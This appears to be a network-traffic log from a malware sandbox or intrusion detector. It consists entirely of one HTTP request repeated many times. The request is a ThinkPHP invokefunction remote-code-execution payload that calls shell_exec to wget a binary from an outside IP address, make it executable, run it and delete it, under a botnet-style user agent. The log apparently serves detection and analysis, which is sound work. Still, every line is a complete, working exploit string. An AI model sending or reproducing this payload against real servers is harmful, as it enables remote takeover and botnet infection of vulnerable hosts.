Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
